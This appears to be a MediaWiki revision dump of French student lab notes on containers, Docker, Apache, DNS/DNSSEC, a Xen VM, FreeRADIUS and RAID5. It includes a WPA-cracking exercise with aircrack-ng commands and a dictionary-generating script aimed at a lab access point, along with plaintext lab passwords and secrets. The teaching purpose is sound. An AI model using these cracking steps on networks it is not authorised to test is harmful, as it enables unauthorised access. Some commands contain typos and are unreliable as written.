[[Fichier:Raidhercule.png|600px]]</div>Mcreteurhttps://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Raidhercule.png&diff=48852Fichier:Raidhercule.png2018-12-17T15:49:21Z<p>Mcreteur : </p>
<hr />
<div></div>Mcreteurhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G7&diff=48850TP sysres IMA5sc 2018/2019 G72018-12-17T15:47:25Z<p>Mcreteur : /* 6. Réalisation */</p>
<hr />
<div>= Wiki de TP =<br />
<br />
=TP GIS=<br />
<br />
==Conteneurs "à la main"==<br />
<br />
===Mise en place des conteneurs===<br />
<br />
*'''Création d'une partition''':<br />
dd if=/dev/zero of=/disk1 bs=1024K count=10240<br />
<br />
*'''Formatage''' : <br />
mtfs.etx4 /disk1<br />
<br />
*'''Montage de la partition''':<br />
mount /disk1 /mnt<br />
<br />
*'''Installation d'un système Debian''':<br />
debootstrap --include=apache2,nano stable /mnt <br />
<br />
*'''Préparation du montage du pseudo système de fichier /proc''':<br />
echo "proc /proc proc defaults 0 0" >> rootfs/etc/fstab<br />
<br />
*''' Démontage ''':<br />
umount /mnt<br />
<br />
*'''Copie en 2 exemplaires''':<br />
cp /disk1 /disk2<br />
cp /disk1 /disk3<br />
<br />
*'''Montage des 3 partitions :'''<br />
mount -oloop /disk1 /mnt/dsk1<br />
mount -oloop /disk2 /mnt/dsk2<br />
mount -oloop /disk3 /mnt/dsk3<br />
<br />
*'''Création du processus isolé par unshare''':<br />
unshare -p -f -m -n -u chroot /mnt/dsk1 /bin/sh -c "mount /proc ; /bin/bash"<br />
unshare -p -f -m -n -u chroot /mnt/dsk2 /bin/sh -c "mount /proc ; /bin/bash"<br />
unshare -p -f -m -n -u chroot /mnt/dsk3 /bin/sh -c "mount /proc ; /bin/bash"<br />
<br />
===Configuration réseau===<br />
*'''Création d'un commutateur logiciel''':<br />
ip link add mehcret2 type bridge<br />
<br />
*'''Création des interfaces virtuelles:'''<br />
ip link add vif1 type veth peer name eth0@vif1<br />
ip link add vif2 type veth peer name eth0@vif2<br />
ip link add vif3 type veth peer name eth0@vif3<br />
ip link add vif4 type veth peer name eth1@vif4<br />
<br />
*'''Ajout d'interfaces dans le commutateur :'''<br />
ip link set vif1 master mehcret2<br />
ip link set vif2 master mehcret2<br />
ip link set vif3 master mehcret2<br />
ip link set vif4 master bridge<br />
<br />
*'''Activation des interfaces''':<br />
ip link set eth0 up<br />
ip link set eth1 up<br />
<br />
*'''Récupération du PID des conteneurs :'''<br />
ps auxwww | grep unshare<br />
<br />
*'''Ajout des interfaces dans les conteneurs :'''<br />
ip link set eth0@vif2 netns /proc/19382/ns/net name eth0 (dsk1)<br />
ip link set eth0@vif1 netns /proc/19377/ns/net name eth0 (dsk2)<br />
ip link set eth1@vif4 netns /proc/19377/ns/net name eth1 (dsk2)<br />
ip link set eth0@vif3 netns /proc/19396/ns/net name eth0 (dsk3)<br />
<br />
*'''Activation du pont:''' <br />
ip address add dev mehcret2 192.168.60.0/24<br />
<br />
*'''Attribution des adresses:'''<br />
ip address add dev eth0 192.168.60.51/24 (dsk1)<br />
ip address add dev eth0 192.168.60.52/24 (dsk2)<br />
ip address add dev eth0 192.168.60.53/24 (dsk3)<br />
ip address add dev eth1 172.26.145.67/24 (dsk2)<br />
ip route add default via 172.26.145.254 (dsk2)<br />
<br />
*'''Activation :'''<br />
ip link set eth0 up<br />
ip link set vif1 up<br />
ip link set vif2 up<br />
ip link set vif3 up<br />
ip link set vif4 up<br />
ip link set mehcret2 up<br />
<br />
On peut désormais pinger entre les différents conteneurs.<br />
<br />
===Configuration des serveurs Web===<br />
<br />
Nous devons maintenant mettre en place les serveurs apache.<br />
<br />
Dans un premier temps, on créé les sous-domaines dont nous avons besoin. Dans les enregistrements DNS du domaine '''plil.space''', on ajoute les enregistrements suivants : <br />
<br />
- mndtMehcret A 172.26.145.67 (mndtMehcret sera le serveur mandataire. On le fait pointer sur l'adresse eth1 du conteneur 2)<br />
<br />
- web1Mehcret CNAME mndtMehcret (Serveur web du conteneur 1)<br />
<br />
- web2Mehcret CNAME mndtMhecret (Serveur web du conteneur 3)<br />
<br />
On configure ensuite les serveurs Apache. On attribue au premier serveur sur le conteneur 1 la configuration suivante dans le répertoire /etc/apache2/sites-available/ :<br />
<br />
<VirtualHost *:80><br />
ServerName web1mehcret.plil.space<br />
Options Indexes FollowSymLinks<br />
DocumentRoot /var/www/html/web1mehcret/<br />
</VirtualHost> <br />
<br />
On fait de même dans le conteneur 3 pour le serveur 2 en mettant les ServerName et Document root associés.<br />
On écrit ensuite une page HTML basique dans les dossiers /var/www/html/web1mehcret/ et /var/www/html/web2mehcret/ afin de reconnaître notre serveur web. <br />
<br />
Il faut maintenant mettre en place le reverse proxy. <br />
Dans le conteneur 2, connectée à la fois à eth0 et eth1, nous mettons en place la configuration suivante :<br />
<br />
<VirtualHost *:80><br />
ServerName mndtMehcret.plil.space<br />
ProxyPass "/web1" "http://192.168.60.51/"<br />
ProxyPassReverse "/web1" "http://192.168.60.51/"<br />
ProxyPass "/web2" "http://"http://192.168.60.53/"<br />
ProxyPassReverse "/web2" "http://192.168.60.53/"<br />
</VirtualHost><br />
<br />
Les lignes ProxyPass et ProxyPassReverse permettent alors la redirection sur les serveurs web du conteneur 1 et 3.<br />
<br />
Après avoir configuré les différents serveurs Apache, il faut redémarrer les services sur chaque conteneur :<br />
<br />
$ service apache2 restart<br />
<br />
Pour utiliser apache en mode reverse proxy, on execute la commande :<br />
<br />
$ a2enmod proxy proxy_http<br />
<br />
11h25 : Serveurs Web unshare OK<br />
<br />
==Conteneurs Docker==<br />
<br />
Avant de lancer un conteneur, il faut modifier le fichier /etc/default/docker et commenter la ligne contenant iptables.<br />
Nous exécutons ensuite la commande :<br />
$ iptables-save<br />
Puis on redémarre le service Docker :<br />
$ service docker restart<br />
<br />
Sans les commandes réalisées précédemment, nous n'avions pas accès au réseau dans les conteneurs.<br />
<br />
Nous pouvons maintenant lancer un conteneur basé sur l'image officielle de debian :<br />
$ docker run -i -t debian<br />
<br />
Dans le conteneur, nous ajoutons le proxy de l'école :<br />
$ export http_proxy=http://proxy.polytech-lille.fr:3128/ <br />
<br />
Nous pouvons maintenant utiliser le gestionnaire de paquets apt afin d'installer apache2 et un éditeur de texte:<br />
$ apt-get update<br />
$ apt-get install apache2, nano, vim<br />
<br />
On sauvegarde ensuite le conteneur pour pouvoir le lancer plus tard en 3 exemplaires : <br />
<br />
$ docker commit [IDduConteneur] mehcret<br />
<br />
On créé un réseau Docker pour isoler nos conteneurs ensemble :<br />
<br />
$ docker network create --driver bridge mehcretnetwork<br />
<br />
Nous lançons ensuite 3 conteneurs sur le réseau précédemment créé en liant le port 80 du conteneur 3 (qui jouera le rôle de reverse proxy) au port 80 de la machine : <br />
<br />
$ docker run -i --network mehcretnetwork --name mehcret1 mehcret<br />
$ docker run -i --network mehcretnetwork --name mehcret2 mehcret<br />
$ docker run -i --network mehcretnetwork --name mehcret3 -p 80:80 mehcret<br />
<br />
Nous créons un nouveau sous domaine, dockerMehcret.plil.space pointant sur l'adresse IP de notre bridge en ajoutant un enregistrement de type A.<br />
Finalement, on configure les différents serveurs Apache comme nous l'avions fait dans la partie précédente.<br />
<br />
<br />
10h30 Serveurs Web (docker) OK<br />
<br />
<br />
=TP PRA=<br />
<br />
Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous aurons à installer une machine virtuelle Xen ainsi qu’à implanter un auto-commutateur téléphonique logiciel. Enfin la mise en place d’un réseau Wifi sécurisé et d’un site web sécurisé nous permettra de mettre en pratiques nos connaissances en la matière.<br />
<br />
==Tâche 5 : Câblage, connexion SR52, cordouan==<br />
<br />
===Connexion des routeurs au réseau de l'école===<br />
<br />
*'''Connexion SR52 - Routeur ISR4221 (E306)'''<br />
<br />
Dans le local SR52, on branche un câble du port 21 du routeur jusqu'au port K-16 du commutateur qui est relié à la prise murale qui se situe au dessus de cordouan en E306.<br />
<br />
Sur le routeur, on passe le port 21 sur le vlan 131 : <br />
<br />
config t<br />
int gi1/0/21<br />
switchport access vlan 131<br />
write<br />
<br />
En E306, on relie le port Gigabit 0/0/0 du routeur ISR4221 à la prise murale SR52.3-K16.<br />
<br />
Les LEDs passent alors au vert et on observe que le port 21 du routeur en SR52 est bien connecté :<br />
<br />
<br />
<gallery mode="nolines" widths=500px heights=400px><br />
<br />
File:TableVlansInterfacesSR52.jpg<br />
<br />
File:LedSR52.jpg<br />
<br />
<br />
</gallery><br />
<br />
*'''Connexion SR52 - Routeur Catalyst 3560 (E304)'''<br />
<br />
En E304, on remarque une fibre libre de code couleur Blanc-Noir, on retrouve cette même fibre connectée au routeur en SR52 sur une interface 10Gb et déjà configurée sur le bon Vlan. On branche alors cette fibre sur la première interface 10 Gb du routeur Catalyst 3560 en E304 en accord avec le groupe configurant ce routeur. Le routeur de la E304 est désormais connecté au réseau de l'école.<br />
<br />
<br />
===Connexion des commutateurs aux routeurs===<br />
<br />
*'''Connexion Routeur Catalyst 3560 - Commutateur 4006 (E304)'''<br />
<br />
Le routeur utilisé en E304 permettant la communication 10Gb, on relie le commutateur au routeur par 10 câbles afin de profiter au maximum des possibilités offertes par le Catalyst 3560. Le groupe s'occupant des commutateurs ayant configuré le commutateur de la E304 pour communiquer avec le routeur de cette même salle par les ports 4 à 13, on branche 10 câbles ethernet sur ces ports que l'on relie au routeur sur les ports 1 à 10.<br />
<br />
*'''Connexion Routeur ISR 4221 - Commutateur 6000 (E306)'''<br />
<br />
Contrairement au routeur utilisé en E304, le routeur en E306 ne permet une communication que Gb. Le commutateur sera donc relié au routeur par un seul câble. En accord avec le groupe configurant le routeur et celui configurant le commutateur, on relie ces derniers par un câble ethernet du port Gigabit 0/0/2 du routeur au port 14 du commutateur.<br />
<br />
*'''Connexion Routeur ISR 4221 (E306) - Commutateur 4006 (E304) '''<br />
<br />
La connexion entre le routeur et le commutateur doit se faire par fibre étant donné que ces deux appareils se trouvent dans deux salles différentes. On utilise pour cela la fibre disponible de code couleur (A COMPLETER). Du côté de la salle E306, on connecte la fibre à l'interface Gb 0/0/1. En E304, on connecte la fibre sur un port UPLINK du commutateur.<br />
<br />
*'''Connexion Commutateur 6000 (E306) - Routeur Catalyst 3560 (E304) '''<br />
<br />
La connexion au niveau du routeur ne pouvant se faire ici que par cuivre, nous devons utiliser un convertisseur fibre - cuivre. Pour interconnecter le commutateur 6000 au routeur Catalyst 3560, nous utilisons la fibre disponible de code couleur ORANGE. On connecte alors cette fibre sur le port (A COMPLETER) du commutateur de la E306. De l'autre côté, en E304, on connecte la fibre à un convertisseur puis le convertisseur au port 11 du routeur par un câble ethernet en accord avec le groupe configurant ce routeur.<br />
<br />
===Connexions au serveur Cordouan===<br />
<br />
Finalement, il faut connecter le serveur Cordouan à notre réseau afin d'avoir du réseau sur nos futures VM. <br />
<br />
*'''Connexion Commutateur 6000 (E306) - Serveur Cordouan '''<br />
<br />
Le commutateur 6000 se trouvant dans la même salle que le serveur Cordouan, on peut relier ces derniers par cuivre. On relie alors le port 17 au serveur Cordouan par câble ethernet.<br />
<br />
*'''Connexion Routeur Catalyst 3560 (E306) - Serveur Cordouan '''<br />
<br />
Ces deux appareils se trouvant dans deux salles différentes, la connexion ne peut se faire que par fibre. Cependant, nous ne disposons plus de convertisseur. Nous avons donc relié le serveur Cordouan au routeur de la E306 plutôt qu'au commutateur. Nous avons pour cela utilisé la fibre de code couleur BLEU. Nous connectons d'un côté la fibre au deuxième port Gigabit du routeur 3560, et de l'autre, la fibre au serveur Cordouan.<br />
<br />
===Connexion des commutateurs aux points d'accès===<br />
<br />
===Schéma résumant le câblage réalisé :===<br />
<br />
[[Fichier:ArchitectureMehCret.png|1500px]]<br />
<br />
== 2.Installation des systèmes d'exploitation==<br />
<br />
===Création de la machine virtuelle===<br />
<br />
Création d'une machine virtuelle sur cordouan.insecserv.deule.net :<br />
<br />
xen-create-image --hostname=hercule --ip=193.48.57.183 --netmask=255.255.255.224 --gateway=193.48.57.160 --dir=/usr/local/xen<br />
<br />
Il fois la machine créée, on ajoute le bridge dans la config hercule.cfg<br />
<br />
vif = ['ip=193.48.57.183 , mac=#####, bridge=StudentsInfo']<br />
xen create hercule.cfg<br />
<br />
On vérifie que la machine est bien créée en s'y connectant :<br />
<br />
xl console hercule<br />
<br />
Création des partitions logiques sur Cordouan pour la machine virtuelle :<br />
lvcreate -L 10G -n /dev/virtual/hercule-home -v<br />
lvcreate -L 10G -n /dev/virtual/hercule-var -v<br />
<br />
Modification du fichier de configuration de la machine virtuelle pour prendre en compte ces volumes créés. Ajout des lignes : <br />
'phy:/dev/virtual/hercule-home,xvdb1,w',<br />
'phy:/dev/virtual/hercule-var,xvdb2,w'<br />
<br />
On relance la VM.<br />
On formate les disques créés sur la machine :<br />
mkfs -t ext4 /dev/xvdb1<br />
mkfs -t ext4 /dev/xvdb2<br />
<br />
Afin de lier le home de notre vm au disque créé précédemment, on modifie le fichier /etc/fstab en y ajoutant la ligne suivante :<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
Puis on effectue le montage :<br />
mount -a <br />
<br />
Pour le var, il faut monter temporairement le disque pour ne pas occulter le repertoire : <br />
mount /dev/xvdb2 /mnt<br />
<br />
On déplace ensuite le contenu de var dans le point de montage précédemment créé :<br />
mv /var/* /mnt<br />
<br />
Finalement, on ajoute dans le fichier /etc/fstab la ligne suivante pour effectuer le montage permanent :<br />
/dev/xvdb2 /var ext4 defaults 0 2<br />
<br />
On applique les modifications :<br />
mount -a<br />
<br />
==4.Services internet==<br />
<br />
<br />
===Serveur DNS===<br />
<br />
Achat du domaine hercule.pw sur gandi.<br />
<br />
Installation de bind9: <br />
<br />
apt install bind9 bind9-host dnsutils<br />
<br />
Modification de la configuration de bind9 :<br />
On créé un fichier de configuration de zone db.hercule.space dans /etc/bind/ avec le contenu suivant : <br />
<br />
;<br />
; BIND data file for local loopback interface<br />
;<br />
$TTL 604800<br />
@ IN SOA ns.hercule.space. root.hercule.space (<br />
3 ; Serial<br />
604800 ; Refresh<br />
86400 ; Retry<br />
2419200 ; Expire<br />
604800 ) ; Negative Cache TTL<br />
;<br />
IN NS ns.hercule.space.<br />
IN NS ns6.gandi.net<br />
@ IN A 193.48.57.183<br />
ns IN A 193.48.57.183<br />
www IN A 193.48.57.183<br />
<br />
Ajout de notre zone DNS en modifiant le fichier /etc/bind/named.conf.local :<br />
<br />
zone "hercule.space" {<br />
type master;<br />
file "/etc/bind/db.hercule.space"; <br />
allow-transfer {217.70.177.40;};<br />
};<br />
<br />
La ligne 'allow-transfer' précise les adresses des serveurs esclaves Gandi.<br />
<br />
Redémarrage du serveur bind9 :<br />
service bind9 restart<br />
<br />
Ajout de glue records sur Gandi pour permettre l'association du serveur DNS créé avec notre adresse IP : <br />
name : ns.hercule.space<br />
IP address : 193.48.57.183<br />
<br />
Changement du nameserver principal sur Gandi (A FAIRE): <br />
DNS 1 : ns.hercule.space<br />
<br />
On laisse ceux de Gandi pour les deux serveurs esclaves<br />
<br />
ZONES INVERSES A FAIRE<br />
<br />
===DNSSEC===<br />
<br />
Dans un premier temps, on active DNSSEC en ajoutant dans le fichier /etc/bind/named la ligne :<br />
dnssec-enable yes;<br />
<br />
Création d'un répertoire de nom hercule.space.dnssec pour y générer les clefs<br />
<br />
Création de la clef asymétrique de signature de clefs de zone :<br />
<br />
dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE hercule.space<br />
:<br />
Création de la clef asymétrique de la zone pour signer les enregistrements :<br />
<br />
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE hercule.space<br />
<br />
On renomme ces clef : <br />
hercule.space-ksk.key<br />
hercule.space-zsk.key<br />
<br />
Puis on les inclus dans le fichier /etc/bind/db.hercule.space<br />
$include /etc/bind/hercule.space.dnssec/hercule.space-ksk.key<br />
$include /etc/bind/hercule.space.dnssec/hercule.space-zsk.key<br />
<br />
On signe les enregistrements de la zone :<br />
dnssec-signzone -o hercule.space -k hercule.space-ksk ../db.hercule.space hercule.space-zsk<br />
<br />
On modifie le fichier named.conf.local pour utiliser la zone signée de suffixe .signed :<br />
file "/etc/bind/db.hercule.space.signed";<br />
<br />
On communique les parties publiques de la KSK et ZSK à Gandi dans l'onglet DNSSEC. On n'oublie pas également d'incrémenter le SERIAL dans le fichier db.hercule.space.<br />
<br />
===Serveur Apache===<br />
<br />
<br />
Création du dossier /var/www/www.hercule.pw<br />
<br />
*''' Certification SSL :'''<br />
<br />
Génération du Certificate Signing Request (CSR) pour Gandi sur la VM :<br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout hercule.pw.key -out hercule.pw.csr<br />
<br />
On copie le contenu de la clé générée sur Gandi. Pour valider la certification SSL, on choisi la méthode par DNS Record. On ajoute alors l'enregistrement CNAME proposé par Gandi dans notre configuration de zone sur la VM. Il faut maintenant patienter le temps du traitement. <br />
<br />
*'''Configuration Apache :'''<br />
<br />
Configuration du serveur web dans le fichier /etc/apache2/sites-available/hercule.space.conf<br />
<br />
<VirtualHost 193.48.57.183:443><br />
ServerName www.hercule.space<br />
ServerAlias hercule.space<br />
DocumentRoot /var/www/html/<br />
CustomLog /var/log/apache2/secure_acces.log combined<br />
<br />
SSLEngine on<br />
SSLCertificateFile /etc/ssl/certs/www.hercule.space.crt<br />
SSLCertificateKeyFile /etc/ssl/private/hercule.space.key<br />
SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem<br />
SSLVerifyClient None<br />
</VirtualHost><br />
<br />
<VirtualHost 193.48.57.183:80><br />
ServerName www.hercule.space<br />
ServerAlias hercule.space<br />
Redirect / https://www.hercule.space<br />
</VirtualHost><br />
<br />
<br />
Modification du fichier ports.conf pour que le serveur web écoute sur le port 443 :<br />
<br />
Listen 80 443<br />
<br />
On active enfin le module SSL, notre site, et on redémarre le service apache :<br />
a2enmod ssl<br />
a2ensite hercule.space.conf<br />
service apache2 restart<br />
<br />
===Serveur Freeradius===<br />
<br />
Installation de Freeradius sur la vm :<br />
apt-get install freeradius<br />
<br />
On ajoute ensuite un utilisateur au serveur freeradius. Pour cela, dans le fichier /etc/freeradius/3.0/users on ajoute : <br />
hercule Cleartext-Password := "glopglop"<br />
<br />
Il nous est demandé de configurer le serveur en PEAP-MSCHAPv2. Pour cela, on modifie les fichiers : <br />
<br />
- /etc/freeradius/mods-enabled/eap.conf :<br />
default_eap_type = peap<br />
<br />
- /etc/freeradius/mods-enabled/mschap :<br />
use_mppe = yes<br />
require_encryption = yes<br />
require_strong = yes<br />
with_ntdomain_hack = yes<br />
<br />
<br />
On ajoute les points d'accès dans notre configuration de serveur (fichier : /etc/freeradius/3.0/clients.conf) :<br />
client 192.168.0.10/32 <br />
{<br />
secret = secretIMA5SC<br />
shortname = borneDivinite<br />
}<br />
<br />
client 192.168.0.11/32 <br />
{<br />
secret = secretIMA5SC<br />
shortname = borneDivinite<br />
}<br />
<br />
<br />
On met à jour la configuration : <br />
ldconfig<br />
<br />
== 5. Tests d'intrusion ==<br />
===Crackage de clé WPA===<br />
<br />
Afin de lancer le crackage de clé WPA sur le point d'accès cracotte07, nous avons besoin du package aircrack-ng que nous installons. Nous affichons ainsi nos interfaces avec la commande :<br />
<br />
$ iwconfig<br />
<br />
Nous lançons alors airmon-ng avec notre interface wifi (wlp2s0) :<br />
<br />
$ airmon-ng start wlp2s0mon<br />
<br />
Nous affichons ensuite tout les point d'accés environnants en utilisant la commande :<br />
<br />
$ airodump-ng wlp2s0mon<br />
<br />
Nous capturons des paquets provenants de cracotte07 que nous enregistrons dans un fichier :<br />
<br />
$ airodump-ng -c 9 --bssid 04:DA:d2:9C:50:56 -w ./path_to_folder/cracotte07 wlp2s0mon<br />
<br />
Une fois les fichiers générés, nous les transférons sur une ZABETH. Avant de lancer le craquage, nous devons générer un dictionnaire contenant toutes les combinaisons possibles de 8 chiffres. Pour cela, nous réalisons le script bash suivant :<br />
<br />
#!/bin/bash<br />
charset=({0..9})<br />
permute(){<br />
(($1 == 0)) && { echo "$2"; return; }<br />
for char in "${charset[@]}"<br />
do<br />
permute "$((${1} - 1 ))" "$2$char"<br />
done<br />
}<br />
permute "$1"<br />
<br />
Que nous laçons en exécutant :<br />
<br />
$ ./comb.sh 8 >> dictionnaire.txt<br />
<br />
Le crack est effectué en lançant la commande :<br />
<br />
$ aircrack-ng -a2 -b 04:DA:D2:9C:50:56 -w /path_to_file/dictionnaire.txt /path_to_file/*.cap<br />
<br />
Nous récupérons la clé après quelques heures de calcul :<br />
<br />
[[Fichier:Crack groupe7.png|600px]]<br />
<br />
== 6. Réalisation ==<br />
<br />
===6.1 Sécurisation de données===<br />
<br />
Création de trois partitions LVM de 1Go sur Cordouan : <br />
lvcreate -L 1G -n /dev/virtual/hercule1 -v<br />
lvcreate -L 1G -n /dev/virtual/hercule2 -v<br />
lvcreate -L 1G -n /dev/virtual/hercule3 -v<br />
<br />
Modification du fichier de configuration de la machine virtuelle pour prendre en compte ces volumes créés. Ajout des lignes :<br />
<br />
'phy:/dev/virtual/hercule1,xvdc1,w',<br />
'phy:/dev/virtual/hercule2,xvdc2,w',<br />
'phy:/dev/virtual/hercule3,xvdc3,w'<br />
<br />
<br />
Installation du paquetage mdadm pour réaliser le RAID5 logiciel :<br />
apt-get install mdadm<br />
<br />
Création du RAID5 :<br />
mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdc1 /dev/xvdc2 /dev/xvdc3<br />
<br />
On formate le RAID créé : <br />
mkfs -t ext4 /dev/md0<br />
<br />
On monte le RAID dans notre VM : <br />
mount /dev/md0 /mnt <br />
<br />
On créé un fichier sur le RAID pour qu'il contienne des données. On ferme la VM et on lui retire la partition xvdc3 dans sa config.<br />
On relance la VM. Puis on essaye de remonter le RAID : <br />
En voulant remonter /dev/md0, un message nous indique que md0 n'existe pas. On lance alors la commande : <br />
cat /proc/mdstat<br />
Et on s'aperçoit que notre RAID est toujours présent, cette fois n'ayant plus que deux disques, mais apparaît sous le nom md127. On monte alors ce derrnier : <br />
mount /dev/md127 /mnt<br />
On retrouve alors bien le fichier créé initialement sur notre RAID. Lors de sa création, le fichier a été copié sur les 3 disques par le RAID. Ainsi, lorsque que nous avons supprimé un disque, cela n'a pas eu d'impact sur nos données.</div>Mcreteurhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G7&diff=48820TP sysres IMA5sc 2018/2019 G72018-12-17T15:12:51Z<p>Mcreteur : /* 6. Réalisation */</p>
<hr />
<div>= Wiki de TP =<br />
<br />
=TP GIS=<br />
<br />
==Conteneurs "à la main"==<br />
<br />
===Mise en place des conteneurs===<br />
<br />
*'''Création d'une partition''':<br />
dd if=/dev/zero of=/disk1 bs=1024K count=10240<br />
<br />
*'''Formatage''' : <br />
mtfs.etx4 /disk1<br />
<br />
*'''Montage de la partition''':<br />
mount /disk1 /mnt<br />
<br />
*'''Installation d'un système Debian''':<br />
debootstrap --include=apache2,nano stable /mnt <br />
<br />
*'''Préparation du montage du pseudo système de fichier /proc''':<br />
echo "proc /proc proc defaults 0 0" >> rootfs/etc/fstab<br />
<br />
*''' Démontage ''':<br />
umount /mnt<br />
<br />
*'''Copie en 2 exemplaires''':<br />
cp /disk1 /disk2<br />
cp /disk1 /disk3<br />
<br />
*'''Montage des 3 partitions :'''<br />
mount -oloop /disk1 /mnt/dsk1<br />
mount -oloop /disk2 /mnt/dsk2<br />
mount -oloop /disk3 /mnt/dsk3<br />
<br />
*'''Création du processus isolé par unshare''':<br />
unshare -p -f -m -n -u chroot /mnt/dsk1 /bin/sh -c "mount /proc ; /bin/bash"<br />
unshare -p -f -m -n -u chroot /mnt/dsk2 /bin/sh -c "mount /proc ; /bin/bash"<br />
unshare -p -f -m -n -u chroot /mnt/dsk3 /bin/sh -c "mount /proc ; /bin/bash"<br />
<br />
===Configuration réseau===<br />
*'''Création d'un commutateur logiciel''':<br />
ip link add mehcret2 type bridge<br />
<br />
*'''Création des interfaces virtuelles:'''<br />
ip link add vif1 type veth peer name eth0@vif1<br />
ip link add vif2 type veth peer name eth0@vif2<br />
ip link add vif3 type veth peer name eth0@vif3<br />
ip link add vif4 type veth peer name eth1@vif4<br />
<br />
*'''Ajout d'interfaces dans le commutateur :'''<br />
ip link set vif1 master mehcret2<br />
ip link set vif2 master mehcret2<br />
ip link set vif3 master mehcret2<br />
ip link set vif4 master bridge<br />
<br />
*'''Activation des interfaces''':<br />
ip link set eth0 up<br />
ip link set eth1 up<br />
<br />
*'''Récupération du PID des conteneurs :'''<br />
ps auxwww | grep unshare<br />
<br />
*'''Ajout des interfaces dans les conteneurs :'''<br />
ip link set eth0@vif2 netns /proc/19382/ns/net name eth0 (dsk1)<br />
ip link set eth0@vif1 netns /proc/19377/ns/net name eth0 (dsk2)<br />
ip link set eth1@vif4 netns /proc/19377/ns/net name eth1 (dsk2)<br />
ip link set eth0@vif3 netns /proc/19396/ns/net name eth0 (dsk3)<br />
<br />
*'''Activation du pont:''' <br />
ip address add dev mehcret2 192.168.60.0/24<br />
<br />
*'''Attribution des adresses:'''<br />
ip address add dev eth0 192.168.60.51/24 (dsk1)<br />
ip address add dev eth0 192.168.60.52/24 (dsk2)<br />
ip address add dev eth0 192.168.60.53/24 (dsk3)<br />
ip address add dev eth1 172.26.145.67/24 (dsk2)<br />
ip route add default via 172.26.145.254 (dsk2)<br />
<br />
*'''Activation :'''<br />
ip link set eth0 up<br />
ip link set vif1 up<br />
ip link set vif2 up<br />
ip link set vif3 up<br />
ip link set vif4 up<br />
ip link set mehcret2 up<br />
<br />
On peut désormais pinger entre les différents conteneurs.<br />
<br />
===Configuration des serveurs Web===<br />
<br />
Nous devons maintenant mettre en place les serveurs apache.<br />
<br />
Dans un premier temps, on créé les sous-domaines dont nous avons besoin. Dans les enregistrements DNS du domaine '''plil.space''', on ajoute les enregistrements suivants : <br />
<br />
- mndtMehcret A 172.26.145.67 (mndtMehcret sera le serveur mandataire. On le fait pointer sur l'adresse eth1 du conteneur 2)<br />
<br />
- web1Mehcret CNAME mndtMehcret (Serveur web du conteneur 1)<br />
<br />
- web2Mehcret CNAME mndtMhecret (Serveur web du conteneur 3)<br />
<br />
On configure ensuite les serveurs Apache. On attribue au premier serveur sur le conteneur 1 la configuration suivante dans le répertoire /etc/apache2/sites-available/ :<br />
<br />
<VirtualHost *:80><br />
ServerName web1mehcret.plil.space<br />
Options Indexes FollowSymLinks<br />
DocumentRoot /var/www/html/web1mehcret/<br />
</VirtualHost> <br />
<br />
On fait de même dans le conteneur 3 pour le serveur 2 en mettant les ServerName et Document root associés.<br />
On écrit ensuite une page HTML basique dans les dossiers /var/www/html/web1mehcret/ et /var/www/html/web2mehcret/ afin de reconnaître notre serveur web. <br />
<br />
Il faut maintenant mettre en place le reverse proxy. <br />
Dans le conteneur 2, connectée à la fois à eth0 et eth1, nous mettons en place la configuration suivante :<br />
<br />
<VirtualHost *:80><br />
ServerName mndtMehcret.plil.space<br />
ProxyPass "/web1" "http://192.168.60.51/"<br />
ProxyPassReverse "/web1" "http://192.168.60.51/"<br />
ProxyPass "/web2" "http://"http://192.168.60.53/"<br />
ProxyPassReverse "/web2" "http://192.168.60.53/"<br />
</VirtualHost><br />
<br />
Les lignes ProxyPass et ProxyPassReverse permettent alors la redirection sur les serveurs web du conteneur 1 et 3.<br />
<br />
Après avoir configuré les différents serveurs Apache, il faut redémarrer les services sur chaque conteneur :<br />
<br />
$ service apache2 restart<br />
<br />
Pour utiliser apache en mode reverse proxy, on execute la commande :<br />
<br />
$ a2enmod proxy proxy_http<br />
<br />
11h25 : Serveurs Web unshare OK<br />
<br />
==Conteneurs Docker==<br />
<br />
Avant de lancer un conteneur, il faut modifier le fichier /etc/default/docker et commenter la ligne contenant iptables.<br />
Nous exécutons ensuite la commande :<br />
$ iptables-save<br />
Puis on redémarre le service Docker :<br />
$ service docker restart<br />
<br />
Sans les commandes réalisées précédemment, nous n'avions pas accès au réseau dans les conteneurs.<br />
<br />
Nous pouvons maintenant lancer un conteneur basé sur l'image officielle de debian :<br />
$ docker run -i -t debian<br />
<br />
Dans le conteneur, nous ajoutons le proxy de l'école :<br />
$ export http_proxy=http://proxy.polytech-lille.fr:3128/ <br />
<br />
Nous pouvons maintenant utiliser le gestionnaire de paquets apt afin d'installer apache2 et un éditeur de texte:<br />
$ apt-get update<br />
$ apt-get install apache2, nano, vim<br />
<br />
On sauvegarde ensuite le conteneur pour pouvoir le lancer plus tard en 3 exemplaires : <br />
<br />
$ docker commit [IDduConteneur] mehcret<br />
<br />
On créé un réseau Docker pour isoler nos conteneurs ensemble :<br />
<br />
$ docker network create --driver bridge mehcretnetwork<br />
<br />
Nous lançons ensuite 3 conteneurs sur le réseau précédemment créé en liant le port 80 du conteneur 3 (qui jouera le rôle de reverse proxy) au port 80 de la machine : <br />
<br />
$ docker run -i --network mehcretnetwork --name mehcret1 mehcret<br />
$ docker run -i --network mehcretnetwork --name mehcret2 mehcret<br />
$ docker run -i --network mehcretnetwork --name mehcret3 -p 80:80 mehcret<br />
<br />
Nous créons un nouveau sous domaine, dockerMehcret.plil.space pointant sur l'adresse IP de notre bridge en ajoutant un enregistrement de type A.<br />
Finalement, on configure les différents serveurs Apache comme nous l'avions fait dans la partie précédente.<br />
<br />
<br />
10h30 Serveurs Web (docker) OK<br />
<br />
<br />
=TP PRA=<br />
<br />
